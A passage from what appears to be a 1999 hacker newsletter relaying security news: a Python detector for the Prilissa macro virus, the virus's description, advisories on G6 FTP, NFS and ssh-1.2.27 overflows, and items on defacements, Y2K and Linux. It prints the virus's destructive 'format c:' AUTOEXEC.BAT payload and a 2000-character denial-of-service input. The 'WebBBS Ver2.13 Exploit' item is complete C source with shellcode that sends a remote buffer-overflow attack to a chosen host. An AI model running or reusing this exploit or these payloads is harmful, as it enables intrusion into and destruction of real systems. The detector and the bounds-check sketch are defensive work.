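samples are constructed test inputs, and matching on Options.VirusProtection
is an assumption about how the macro warning gets switched off."""
import re

# Registry marker the virus writes after mailing itself (HKCU key, value, data).
MARKER_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Office"
MARKER_NAME = "CyberNET"
MARKER_DATA = "(C)1999 - Indonesia by AnomOke!"

# What the December 25th payload writes to C:\AUTOEXEC.BAT.
AUTOEXEC_PAYLOAD = [
    "@echo off",
    "@echo Vine...Vide...Vice...Moslem Power Never End...",
    "@echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus !!!",
    "ctty nul",
    "format c: /autotest /q /u",
]

# Macro traits: auto-run hooks in ThisDocument, Outlook automation, warning off.
VBA_HOOK = re.compile(r"^\s*(?:Private\s+)?Sub\s+Document_(Open|Close)\b", re.I | re.M)
VBA_OUTLOOK = re.compile(r'CreateObject\s*\(\s*"Outlook\.Application"\s*\)', re.I)
VBA_WARN_OFF = re.compile(r"VirusProtection\s*=", re.I)   # assumed mechanism


def check_registry(values):
    """values: {(key, value_name): data}, e.g. parsed out of a .reg export."""
    data = values.get((MARKER_KEY, MARKER_NAME))
    if data is None:
        return []
    hit = "registry marker present"
    if data == MARKER_DATA:
        hit += " with the documented data"
    return [hit]


def check_autoexec(text):
    """Flag the unattended format line on its own, and the full payload."""
    lines = [l.strip() for l in text.splitlines()]
    hits = []
    if AUTOEXEC_PAYLOAD[-1] in lines:
        hits.append("AUTOEXEC.BAT contains an unattended format of C:")
    if all(p in lines for p in AUTOEXEC_PAYLOAD):
        hits.append("AUTOEXEC.BAT matches the full Prilissa payload")
    return hits


def check_vba(source):
    """Score exported macro source; a clean macro should return []."""
    hits = []
    hooks = sorted({m.group(1).lower() for m in VBA_HOOK.finditer(source)})
    if hooks:
        hits.append("auto-run hook(s): " + ", ".join(hooks))
    if VBA_OUTLOOK.search(source):
        hits.append("Outlook automation from a document macro")
    if VBA_WARN_OFF.search(source):
        hits.append("disables the Word macro warning")
    if MARKER_NAME in source:
        hits.append("references the CyberNET marker")
    return hits


def scan(registry, autoexec, vba):
    """All findings for one host, in the order registry, AUTOEXEC.BAT, macros."""
    return check_registry(registry) + check_autoexec(autoexec) + check_vba(vba)


# Constructed samples for the test run (not the virus).
SAMPLE_REGISTRY = {(MARKER_KEY, MARKER_NAME): MARKER_DATA}
SAMPLE_AUTOEXEC = "\r\n".join(AUTOEXEC_PAYLOAD) + "\r\n"
SAMPLE_VBA = (
    "Private Sub Document_Open()\n"
    "    Options.VirusProtection = (1 - 1)\n"
    '    Set ol = CreateObject("Outlook.Application")\n'
    "End Sub\n"
    "Private Sub Document_Close()\n"
    "End Sub\n"
)
CLEAN_VBA = 'Sub Hello()\n    MsgBox "hi"\nEnd Sub\n'

if __name__ == "__main__":
    for finding in scan(SAMPLE_REGISTRY, SAMPLE_AUTOEXEC, SAMPLE_VBA):
        print("-", finding)
```

Two caveats that fall out of the description itself: the marker key doubles as an inoculation, since the virus skips the Outlook mail-out when it finds the key, but it does nothing against infection of normal.dot or the December 25th payload, which keys on the date and not on the marker; and the AUTOEXEC.BAT check only helps before the next reboot, because that is when the format runs.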
If this key is not found, the virus code uses VBA instructions to create a MS Outlook email message with the subject line "Message From " (Office97 UserName) and a message body of "This document is very Important and you've GOT to read this !!!". The first 50 listings from all available address books are selected as the recipients - the message is then sent with an attachment of the infected document. Lastly, the virus code creates the registry key. If this key does exist, the email propagation is not repeated.

If the date is December 25th (any year), the virus runs a destructive payload to overwrite the existing C:\AUTOEXEC.BAT file with the following instructions:

    @echo off
    @echo Vine...Vide...Vice...Moslem Power Never End...
    @echo Your Computer Have Just Been Terminated By -= CyberNET =- Virus !!!
    ctty nul
    format c: /autotest /q /u

Since the AUTOEXEC.BAT is not used on Windows NT, this payload is not applicable to that operating system. The next reboot of the computer will run the AUTOEXEC.BAT file causing an unconditional automated format of the hard drive. Also, a message box is displayed within Word97 with the following text:

    (C) 1999 - CyberNET
    Vine... Vide... Vice...Moslem Power Never End...
    You Dare Rise Against Me...
    The Human Era is Over, The CyberNET Era Has Come!!!
    [OK]

After clicking on the OK dialogue box, a random number of randomly colored and random size and type objects fill the document as an overlay. Another virus which uses this overlay is the W97M/Pri virus.

Indications Of Infection

Macro warning if opening infected document, increase in size to global template. Messages on screen as mentioned above. Email propagation as mentioned above.

Method Of Infection

Opening infected documents will infect global template normal.dot.

EXTRA Drivers

VirusScan 4 with the 4.0.25 engine (and above)
Dr. Solomon's AVTK 7.99 and above
VirusScan 3 with the 3.2.2 engine

Virus Information

Discovery Date: 11/17/99
Type: Macro
Risk Assessment: Medium On Watch
Minimum DAT: 4054 (Available 12/2/99)
Variants: Several
Aliases: W97M/Melissa.w, Melissa.w, W97M/Prilissa, W97M/Pri.q, WM97/Melissa-ag, Melissa

@HWA

46.0 GLOBALNET, CROATIAN ISP COMPROMISED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 18th November 1999 on 3:13 pm CET

Second largest Croatian ISP - Globalnet, was penetrated yesterday evening, and the main site was changed. The defacement and the link lead to Croatian web pages.

Link: Monitor http://security.monitor.hr

@HWA

47.0 SEC FILES CHARGES
~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 18th November 1999 on 3:05 pm CET

A Denver-based software company misrepresented the capabilities of its software intended to fix Year 2000 computer problems and filed false earnings claims, according to a suit filed by the Securities and Exchange Commission against the firm and three of its executives.

Link: News.com http://news.cnet.com/news/0-1009-200-1451624.html?tag=st.ne.1009.thed.1009-200-1451624

SEC files suit against Y2K toolmaker
By Erich Luening
Staff Writer, CNET News.com
November 17, 1999, 6:55 a.m. PT

A Denver-based software company misrepresented the capabilities of its software intended to fix Year 2000 computer problems and filed false earnings claims, according to a suit filed by the Securities and Exchange Commission against the firm and three of its executives. The suit, believed to be the first to charge that a software maker overstated the capabilities of a Year 2000 repair tool, alleges that from 1997 through 1999, Accelr8, its chief executive Thomas Geimer, president Harry Fleury and controller James Godkin made false claims about the utility of its Navig8 2000 software, Reuters reported.
The executives are also accused of submitting false financial reports to the SEC during a one-year period that ended April 1999, according to the suit filed in federal court in Denver. The SEC's action seeks an injunction against future violations of the reporting and anti-fraud provision of the federal securities law. The SEC alleges Navig8 2000 was created to analyze computer programs only for the VAX/VMS computer system made by Digital Equipment, which was bought by Compaq Computer in 1998. The company claimed the software addressed Y2K issues for IBM and Microsoft products as well, according to the suit. The company's lawyers dispute the charges, saying Accelr8 has always properly represented the capabilities of its products and feels its accounting practices are appropriate. "We have a dispute with the SEC about the proper application of accounting standards," Simon Krauss, Accelr8's corporate counsel, said in a statement. "Our auditors and a former SEC accounting expert hired by us as a consultant have concurred in the reasonableness of our accounting decisions. Unfortunately, the SEC has the power to claim that anyone with whom they disagree has committed fraud, and has done so in this case." No trial date has been set.

@HWA

48.0 G6 FTP SERVER v2.0 PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Wednesday 17th November 1999 on 6:31 pm CET

UssrLabs found a local/remote DoS attack against G6 FTP Server v2.0 (beta 4/5). A USER command with a 2000-character user name overflows a buffer, after which G6FTP loops endlessly in its main program, eating all memory and CPU until the machine is unusable. No account is needed, since USER is the first thing any client sends.
Link: UssrLabs http://www.ussrback.com/g6ftp/

beta 4/5 Vulnerability
G6 FTP Server v2.0

PROBLEM

UssrLabs found a Local/Remote DoS Attack in G6 FTP Server v2.0 (beta 4/5). The buffer overflow is caused by a long user name of 2000 characters. G6FTP starts to loop infinitely in the main program and eats all memory and all CPU (100%); once no memory is left, the whole system goes down :(

Example:

[gimmemore@itsme]$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220-G6 FTP Server v2.0 (beta 5) ready ...
USER {buffer}

Where buffer is 2000 characters.

Vendor Status: Not Contacted
Vendor Url: http://www.gene6.com/
Program Url: http://www.gene6.com/g6ftpd/download.html
Credit: USSRLABS

SOLUTION: Nothing yet.

u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h

@HWA

49.0 RED HAT SECURITY ADVISORY
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Wednesday 17th November 1999 on 6:22 pm CET

The length of a path name was not checked on the removal of a directory. If a long enough directory name was created, the buffer holding the pathname would overflow, and the possibility exists that arbitrary code could be executed as the user the NFS server runs as (root). Exploiting this buffer overflow does require read/write access to a share on an affected server, so until the update is in, limit writable exports to the hosts that need them rather than exporting them to the world.

Link: Security Focus http://www.securityfocus.com

@HWA

50.0 HPING
~~~~~

From HNS http://www.net-security.org/

by BHZ Wednesday 17th November 1999 on 6:00 pm CET

Hping is a tool for TCP/IP stack auditing: uncovering firewall policy, scanning TCP ports in a number of different modes, transferring files across a firewall, testing network performance, testing whether TOS is handled, etc.
Link: Antirez http://www.kyuzz.org/antirez/hping2.html

@HWA

51.0 RPM UPDATE HELPING UTILITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:17 pm CET

Rhupdmgr is a script which sends an email to the sysadmins when a machine has fallen out of sync with the RedHat Updates. It works by checking a generated list of RPMs to be updated.

Link: Packet Storm http://packetstorm.securify.com/linux/admin/rhupdmgr-0.4.tar.gz

@HWA

52.0 WebBBS Ver2.13 Exploit / Shadow Penguin Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:56 pm CET

In the initial authorization handling of WebBBS, if a long login name or password is received, this CGI overflows. The overflow can be used to execute any instructions which are included in the user name and password.

Link: Packet Storm http://packetstorm.securify.com/9911-exploits/ex_webbbs.c

/*=============================================================================
   WebBBS Ver2.13 Exploit
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN (shadowpenguin@backsection.net)
  =============================================================================
*/
#include
#include
#include
#include

#define HEAD1 \
  "POST /scripts/webbbs.exe HTTP/1.1\r\n"\
  "Accept: application/msword, application/vnd.ms-excel, image/gif, "\
  "image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"\
  "Accept-Language: ja\r\n"\
  "Content-Type: application/x-www-form-urlencoded\r\n"\
  "Accept-Encoding: gzip, deflate\r\n"\
  "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)\r\n"\
  "Host: 192.168.0.100\r\n"\
  "Content-Length: 106\r\n"\
  "Connection: Keep-Alive\r\n\r\n"\
  "uid=&upw="
#define HEAD2       "&JOB=TOP&\r\nsub=+%83%8D%83O%83C%83%93+\r\n"
#define HTTP_PORT   80
#define MAXBUF      80
#define RETADR      48
#define JMPESP_1    0xff
#define JMPESP_2    0xe4
#define NOP         0x90
#define KERNEL_NAME "kernel32.dll"
unsigned char jmp_code[100]={
    0x8B,0xDC,0x33,0xC0,0xB0,0x23,0xC1,0xE0,
    0x10,0x66,0xB8,0x97,0xD9,0x2B,0xD8,0xFF,
    0xE3,0x00
};
unsigned char exp_code[100]={
    0x33,0xC0,0x50,0x50,0xB0,0x12,0x50,0x66,
    0xB8,0xFF,0xFF,0x50,0xB8,0xb8,0x58,0xf5,
    0xbf,0xff,0xd0,0x50,0x50,0xB8,0x2c,0x23,
    0xf5,0xbf,0xff,0xd0,0x00
};

main(int argc,char *argv[])
{
    SOCKET      sock;
    SOCKADDR_IN addr;
    WSADATA     wsa;
    WORD        wVersionRequested;
    unsigned int i,kp,ip;
    static unsigned char buf[MAXBUF],buf2[1000],buf3[1000],*q;
    struct hostent *hs;
    MEMORY_BASIC_INFORMATION meminfo;

    if (argc<2){
        printf("usage: %s VictimHost\n",argv[0]);
        exit(1);
    }
    if ((void *)(kp=(unsigned int)LoadLibrary(KERNEL_NAME))==NULL){
        printf("Can not find %s\n",KERNEL_NAME);
        exit(1);
    }
    VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION));
    ip=0;
    for (i=0;i>8 )&0xff)==0 || ((ip>>16)&0xff)==0 || ((ip>>24)&0xff)==0) continue;
        q=(unsigned char *)ip;
        if (*q==JMPESP_1 && *(q+1)==JMPESP_2) break;
    }
    printf("RETADR : %x\n",ip);
    if (ip==0){
        printf("Can not find codes which are used by exploit.\n");
        exit(1);
    }
    wVersionRequested = MAKEWORD( 2, 0 );
    if (WSAStartup(wVersionRequested , &wsa)!=0){
        printf("Winsock Initialization failed.\n");
        return -1;
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        printf("Can not create socket.\n");
        return -1;
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons((u_short)HTTP_PORT);
    if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if ((hs=gethostbyname(argv[1]))==NULL){
            printf("Can not resolve specified host.\n");
            return -1;
        }
        addr.sin_family = hs->h_addrtype;
        memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
        printf("Can not connect to specified host.\n");
        return -1;
    }
    memset(buf,NOP,MAXBUF);
    buf[MAXBUF]=0;
    strncpy(buf,exp_code,strlen(exp_code));
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    strncpy(buf+RETADR+4,jmp_code,strlen(jmp_code));
    send(sock,HEAD1,strlen(HEAD1),0);
    send(sock,buf,strlen(buf),0);
    send(sock,HEAD2,strlen(HEAD2),0);
    closesocket(sock);
    printf("Done.\n");
    return FALSE;
}

@HWA

53.0 SENATE.GOV BITES THE DUST
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:14 pm CET

One of the web sites on senate.gov was defaced earlier today. meetingout.senate.gov was hit, and the main page changed with: "rackmount. the 19-inch warrior. now available in 1u, 2u, and 4u flavors. shouts to [sSh]. good fellaz".

Link: Attrition http://www.attrition.org/mirror/attrition/1999/11/17/meetingout.senate.gov/

@HWA

54.0 NEW NESSUS
~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:09 pm CET

Nessus is a free, open-source and up-to-date remote security scanner for Linux, BSD, Solaris and some other systems. It is multithreaded, plugin-based, has a nice GTK interface and currently performs over 270 remote security checks.

Link: The Nessus Project http://www.nessus.org/

@HWA

55.0 DELEGATE
~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 5:04 pm CET

Delegate, a multiple-service proxy server, contains several hundred buffer overflows and is horribly insecure in general. There is a demonstration exploit for just one remotely exploitable buffer overflow in delegate, compiled on Linux.

Link: Teso http://teso.scene.at/

@HWA

56.0 SSH PROBLEMS
~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 4:23 pm CET

A remotely exploitable buffer overflow has been found in ssh-1.2.27. The problem is that the length of the session key is not checked. Multiple platforms are vulnerable.
Link: Packet Storm http://packetstorm.securify.com/9911-exploits/ssh-1.2.27.txt

-------------------------------------------------------------------
Periodically, the moderator of the vuln-dev mailing list will post summaries of issues discussed there to Bugtraq and possibly other relevant lists. This will usually happen when an issue has been resolved, or it appears that there will be no further discussion on vuln-dev. Each separate issue will be given its own posting to facilitate referencing them separately, for discussion, forwarding, or appearance in vulnerability databases.

To subscribe to vuln-dev, send an e-mail to listserv@securityfocus.com, with SUBSCRIBE VULN-DEV in the body of the message. A FAQ and archive can be found at www.securityfocus.com-->forums-->vuln-dev (click on these sections, the web pages are forms-based.)
-------------------------------------------------------------------

There appears to be a serious vulnerability in ssh 1.2.27. I will let the folks who worked on this issue describe. There was brief discussion on vuln-dev on the politics of ssh 1 vs. ssh 2, etc... you may or may not want to play that out on Bugtraq. One of the key points of the SSH 1 vs. SSH 2 debate is regarding licensing. Basically, because of a less strict license on SSH 1, more folks are likely to be running that version. (This is all referring to the Datafellows implementation that everyone uses, rather than standards and protocols, I presume.) As usual, check the vuln-dev archives if you want the full story. This isn't necessarily a dead topic there yet, but this issue should get out there sooner rather than later.
BB

-------------------------------------------------------------------
To: Exploit-Dev
Subject: ssh-1.2.27 remote buffer overflow - exploitable
Date: Mon Nov 08 1999 16:48:53
Author: Frank
Message-ID: <19991109014853.3239.qmail@securityfocus.com>

This is submitted to the FreeBSD bug tracking system, although there are doubtless other vendors who leave this package, despite the existence of ssh-2.X. While Debian appears to be immune, I was able to crash my ssh daemon (much to my dismay), and there appears the potential to execute arbitrary code, as long as you encrypt it first...

Here is the FreeBSD report.. it describes the method to crash a remote ssh daemon (let's hope you ran sshd from your xinetd, etc).

http://www.freebsd.org/cgi/query-pr.cgi?pr=14749

-------------------------------------------------------------------
To: Exploit-Dev
Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable
Date: Mon Nov 08 1999 21:04:19
Author: Daniel Jacobowitz
Message-ID: <19991109110419.A29502@drow.res.cmu.edu>

Debian is immune for the (somewhat messy) reason that they do not link ssh to rsaref, last time that I checked.

-------------------------------------------------------------------
To: Exploit-Dev
Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable
Date: Mon Nov 08 1999 21:24:17
Author: Daniel Jacobowitz
Message-ID: <19991109112417.A30046@drow.res.cmu.edu>

And here's a patch. Not tested, as I don't use the rsaref glue on any machine here.

Ed: Patch can be found at:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-08&msg=19991109112417.A30046@drow.res.cmu.edu

-------------------------------------------------------------------
To: Exploit-Dev
Subject: Re: ssh-1.2.27 remote buffer overflow - exploitable
Date: Tue Nov 09 1999 04:42:16
Author: Jochen Bauer
Message-ID: <19991109124216.A28812@luna.theo2.physik.uni-stuttgart.de>

I've taken a closer look at the problem.
Here's my analysis:

In sshd.c, around line 1513 the client-generated session key, that has been encrypted with the server and host public keys, is received from the client as a multiple precision integer.

  /* Get the encrypted integer. */
  mpz_init(&session_key_int);
  packet_get_mp_int(&session_key_int);

The encrypted session key is then (around line 1525) passed to rsa_private_decrypt to do the first part of the decryption, which is either decryption using the server private key or decryption using the host private key, depending on which key has the larger modulus.

  rsa_private_decrypt(&session_key_int, &session_key_int,
                      &sensitive_data.private_key);

If RSAREF is used (i.e. RSAREF is defined in the code), the rsa_private_decrypt function in rsaglue.c (around line 162) looks like:

  void rsa_private_decrypt(MP_INT *output, MP_INT *input, RSAPrivateKey *key)
  {
    unsigned char input_data[MAX_RSA_MODULUS_LEN];
    unsigned char output_data[MAX_RSA_MODULUS_LEN];
    unsigned int input_len, output_len, input_bits;
    [...]
    input_bits = mpz_sizeinbase(input, 2);
    input_len = (input_bits + 7) / 8;
    gmp_to_rsaref(input_data, input_len, input);
    [...]
  }

The trouble spot is the fixed length buffer input_data[MAX_RSA_MODULUS_LEN]. A pointer to this buffer is passed to the conversion function gmp_to_rsaref along with a pointer to the encrypted session key and the length (input_len) of the encrypted session key, which may be greater than [MAX_RSA_MODULUS_LEN]. gmp_to_rsaref (located around line 79 of rsaglue.c) simply calls mp_linearize_msb_first(buf, len, value).

  void gmp_to_rsaref(unsigned char *buf, unsigned int len, MP_INT *value)
  {
    mp_linearize_msb_first(buf, len, value);
  }

mp_linearize_msb_first is contained in mpaux.c around line 41.
The function looks like:

  void mp_linearize_msb_first(unsigned char *buf, unsigned int len,
                              MP_INT *value)
  {
    unsigned int i;
    MP_INT aux;

    mpz_init_set(&aux, value);
    for (i = len; i >= 4; i -= 4)               <-------
      {
        unsigned long limb = mpz_get_ui(&aux);
        PUT_32BIT(buf + i - 4, limb);           <-------
        mpz_div_2exp(&aux, &aux, 32);
      }
    [...]
  }

There's the overflow! len is the length of the encrypted session key, while buf is a pointer to the fixed length buffer input_data[MAX_RSA_MODULUS_LEN] and no check whether len is greater than MAX_RSA_MODULUS_LEN is performed. The fix should be obvious!

About the possible exploit: In this particular overflow, the encrypted, client generated session key has to be taken as the exploit buffer. I.e. the shellcode, NOPs and jump address have to be sent to the server instead of the encrypted session key. To make that clear: The shellcode, NOPs and jump address don't have to be encrypted as they are taken as the ENCRYPTED session key. However, the data that is finally written into the buffer are the limbs of the multiple precision integer that session_key_int is assumed to be. The exploit buffer code therefore must be converted into a multiple precision integer, which upon extraction of the limbs into the buffer yields the correct exploit buffer code. The best way would probably be to start from the exploit buffer as it should finally be to overflow the target buffer and use the functions of the GNU multiple precision integer library to reverse the procedure happening to the encrypted session key in the sshd code step by step, leading to the exploit buffer that has to be sent instead of the encrypted session key. That may be difficult, but I think it's possible.
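Ed: an added illustration of the missing check, not code from ssh-1.2.27, GMP or RSAREF. A toy limb array stands in for MP_INT, the linearisation loop from the posting is reproduced on top of it, and the prologue of rsa_private_decrypt is given the length comparison the posting says is absent, so an oversize client value is refused before any byte is written. MAX_RSA_MODULUS_LEN = 128 (a 1024-bit maximum modulus) is an assumed value.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_RSA_MODULUS_LEN 128   /* assumed: RSAREF sizes this from a 1024-bit modulus */
#define TOY_MAX_LIMBS 64

/* Toy stand-in for GMP's MP_INT: little-endian array of 32-bit limbs
 * (limbs[0] least significant), so the posting's mpz_get_ui /
 * mpz_div_2exp(...,32) pair becomes "take limbs[idx]" / "idx++". */
typedef struct {
    uint32_t limbs[TOY_MAX_LIMBS];
    unsigned nlimbs;
} toy_mp;

/* Analogue of mpz_sizeinbase(value, 2): number of significant bits. */
static unsigned toy_sizeinbits(const toy_mp *v)
{
    unsigned n = v->nlimbs, bits;
    uint32_t top;
    while (n > 0 && v->limbs[n - 1] == 0)
        n--;
    if (n == 0)
        return 1;                       /* GMP reports one digit for zero */
    bits = 32 * (n - 1);
    for (top = v->limbs[n - 1]; top; top >>= 1)
        bits++;
    return bits;
}

/* PUT_32BIT as the ssh sources use it: most significant byte first. */
static void put_32bit(unsigned char *p, uint32_t x)
{
    p[0] = (unsigned char)(x >> 24); p[1] = (unsigned char)(x >> 16);
    p[2] = (unsigned char)(x >> 8);  p[3] = (unsigned char)x;
}

/* Same shape as mp_linearize_msb_first: writes exactly len bytes at buf, low
 * limb last. It cannot know how large buf really is, so the size check has
 * to happen in the caller, before control gets here. */
static void linearize_msb_first(unsigned char *buf, unsigned len, const toy_mp *value)
{
    unsigned i, idx = 0;
    uint32_t limb;
    for (i = len; i >= 4; i -= 4) {
        limb = idx < value->nlimbs ? value->limbs[idx] : 0;
        put_32bit(buf + i - 4, limb);   /* out of bounds whenever len > buffer size */
        idx++;
    }
    /* Remaining 1..3 high-order bytes (the part the posting elides as [...]). */
    limb = idx < value->nlimbs ? value->limbs[idx] : 0;
    while (i > 0) {
        buf[--i] = (unsigned char)limb;
        limb >>= 8;
    }
}

/* Hardened form of the rsa_private_decrypt prologue: derive input_len from the
 * bit length exactly as the posting shows, then refuse anything that would not
 * fit input_data. Returns the number of bytes written, or -1 if too long. */
int rsa_input_to_buffer(unsigned char input_data[MAX_RSA_MODULUS_LEN], const toy_mp *input)
{
    unsigned input_bits = toy_sizeinbits(input);
    unsigned input_len = (input_bits + 7) / 8;
    if (input_len > MAX_RSA_MODULUS_LEN)
        return -1;                      /* the missing check */
    memset(input_data, 0, MAX_RSA_MODULUS_LEN);
    linearize_msb_first(input_data, input_len, input);
    return (int)input_len;
}

/* Constructed "encrypted session key" of nlimbs all-ones limbs; returns what
 * the hardened prologue does with it (byte count, or -1 when rejected). */
int demo_fits(unsigned nlimbs)
{
    toy_mp v;
    unsigned char input_data[MAX_RSA_MODULUS_LEN];
    unsigned i;
    memset(&v, 0, sizeof v);
    v.nlimbs = nlimbs > TOY_MAX_LIMBS ? TOY_MAX_LIMBS : nlimbs;
    for (i = 0; i < v.nlimbs; i++)
        v.limbs[i] = 0xffffffffu;
    return rsa_input_to_buffer(input_data, &v);
}

/* Byte layout check for the 35-bit value 0x5_01020304: expect 05 01 02 03 04. */
int demo_layout(void)
{
    static const unsigned char expect[5] = { 0x05, 0x01, 0x02, 0x03, 0x04 };
    toy_mp v;
    unsigned char input_data[MAX_RSA_MODULUS_LEN];
    memset(&v, 0, sizeof v);
    v.nlimbs = 2;
    v.limbs[0] = 0x01020304u;
    v.limbs[1] = 0x05u;
    return rsa_input_to_buffer(input_data, &v) == 5 &&
           memcmp(input_data, expect, 5) == 0;
}

int main(void)
{
    printf("32 limbs (1024 bits) -> %d bytes\n", demo_fits(32));   /* 128 */
    printf("33 limbs (1056 bits) -> %d\n", demo_fits(33));         /* -1 */
    printf("layout check: %s\n", demo_layout() ? "ok" : "FAIL");
    return 0;
}
```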
@HWA

57.0 TORVALDS: COUPLE OF QUESTIONS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Thursday 18th November 1999 on 2:59 pm CET

No one knows more about the Linux operating system than its creator, Linus Torvalds, and the founder of the largest Linux company, Bob Young of Red Hat. Michael Martinez tracked them down at Comdex and asked them a few questions.

Link: ABC http://abcnews.go.com/sections/tech/DailyNews/comdexqa991116.html

Linux Q&A
Linus Torvalds and Bob Young Answer Your Questions
By Michael Martinez
ABCNEWS.com

L A S V E G A S — No one knows more about the Linux operating system than its creator, Linus Torvalds, and the founder of the largest Linux company, Bob Young of Red Hat. So I tracked them down at Comdex and asked them to answer your questions for you.

Q U E S T I O N: How are you planning to prevent the “Big Guys” (IBM, Hewlett-Packard, Compaq/DEC, Sun) from adding their own features to Linux and causing incompatibilities among different vendors’ products? — Doug MacDonald

A N S W E R: “I really don’t think there’s a problem there,” says Linux creator Torvalds. “A lot of these so-called big guys in particular have been burned by operating systems in the past. Just look at what happened to (IBM’s) OS/2. Nobody wants to touch operating systems. Everybody is so damned happy that somebody else is doing it!

“Everyone that I’ve worked with has been very open with what they are doing with regard to Linux,” Torvalds says. “They aren’t really even trying to be very aggressive with the kernel [the core of the OS which Torvalds oversees, which is essentially the same in all forms of Linux]. The kernel is kind of scary to mess around with, and there just aren’t many developers willing to do it. We’ve seen Linux users grow from 1,000 to 10 million, but the number of people working on the kernel has grown from maybe 100 to 200.

“And remember, the license prevents them from going too far. Everything they do has to be open source.
Any competitor can then come along and grab that code and add it to their version of the system.”

Q U E S T I O N: Linux seems well-suited for server use, where knowledge of the system is necessary to get the best out of it. But the newest influx of users, including myself, wants a new option for the desktop. So far, my experiences have been very disappointing. What can be done to move to a mainstream desktop platform that takes the guesswork out of installing an application? — Rick Tillery

A N S W E R: “Your reader is obviously right because, fundamentally, nobody actually buys operating systems,” Red Hat founder Bob Young says. “People choose the applications they need, then choose the operating system. Microsoft clearly owns the desktop, because if you go to CompUSA, all the shelves have software for Windows.

“We are very actively focused on this problem, and we are very happy with what folks like Corel are doing, bringing over their office (software) suite, with what Sun Microsystems has done with Star Office, with what Applixware is doing with their suite. We’re happy with what Netscape/AOL has been doing with the browser, because the browser was the killer desktop application in the 1990s.”

Red Hat, the leading Linux seller, announced Monday that it will acquire software company Cygnus Solutions for $674 million. Young says this deal will also help.

“Cygnus makes the kind of tools that developers need to create the applications people want,” Young says. “This could go a long way to help provide this total solution that people need to do the kind of things they really want to on the desktop.”

@HWA

58.0 2K PREPARATIONS CAUSED PROBLEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:00 pm CET

Y2K problems are starting before the actual rollover. Attempts by the City of Montreal to stave off a Y2K computer disaster are being blamed for causing the blaze that gutted a fire station.
Link: Canoe http://www.canoe.ca/EdmontonNews/es.es-11-17-0047.html
(Bleh! - 404: url not found)

@HWA

59.0 IS MICROSOFT TO BLAME FOR Y2K?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/
by BHZ Wednesday 17th November 1999 on 6:12 pm CET

David O'Daniel Eddy wrote his opinion on Microsoft, with the actual quote that Microsoft could be called responsible for the Y2K problem. Do read his article entitled "A Knuckleball for Microsoft".

Link: Westergaard http://www.wbn.com/y2ktimebomb/Techcorner/DE/de9946.htm

A Knuckleball for Microsoft
© 1999 By David O'Daniel Eddy
November 17, 1999

Now that we have something really serious -- the Justice Department's ruling that Microsoft is a predatory monopoly -- to distract us, provide a wonderful amorphous target for endless editorial speculation, and generally contribute to landfills, I'd better get my two cents on the table.

A year ago I expressed my reservations about how Microsoft's plunging ahead with Windows 2000 was an indication of their not paying serious attention to Y2K issues on the desktop. Although I recognize that Microsoft has indeed done tremendous good for the PC industry, they are at the same time far too full of their own power and success. They're so powerful now that they are effectively a captive of their own PR spin. If Chairman Bill says Y2K is primarily an old mainframe issue, then that's the way it is. End of discussion.

But reality says something different. Let me share one of my favorite little factoids. My local business library has a directory of desktop (Windows, Unix, Macintosh, Commodore, Amiga, Tandy, etc.) software. It lists 3,056 vendors and 21,000 products. The majority of these commercial software products are what I would broadly classify as accounting packages -- accounts receivable, accounts payable, inventory management, general ledger, etc. The stuff that runs businesses. I don't care how you slice this, that's a lot of software.
And we haven't even looked at the issue of how many different releases or versions of a product are available. Just because a vendor is at v10 of their product is not to say that all v1 versions have been retired in their customer base.

Then I factor in knowledge from the outside world and my Y2K travels. The directory really tracks software packages offered only for broad market sale. It does not include the "package" written by a local CPA firm and installed (in a variety of configurations!) at 25 local client sites. The directory obviously doesn't include products that are no longer sold. It doesn't include the entirely custom software that has been written in the dozens of PC database/language products such as dBase II, dBase III, dBase IV, FoxPro, Paradox, 4D, Revelation, Alpha Four, FileMaker, and Clipper.

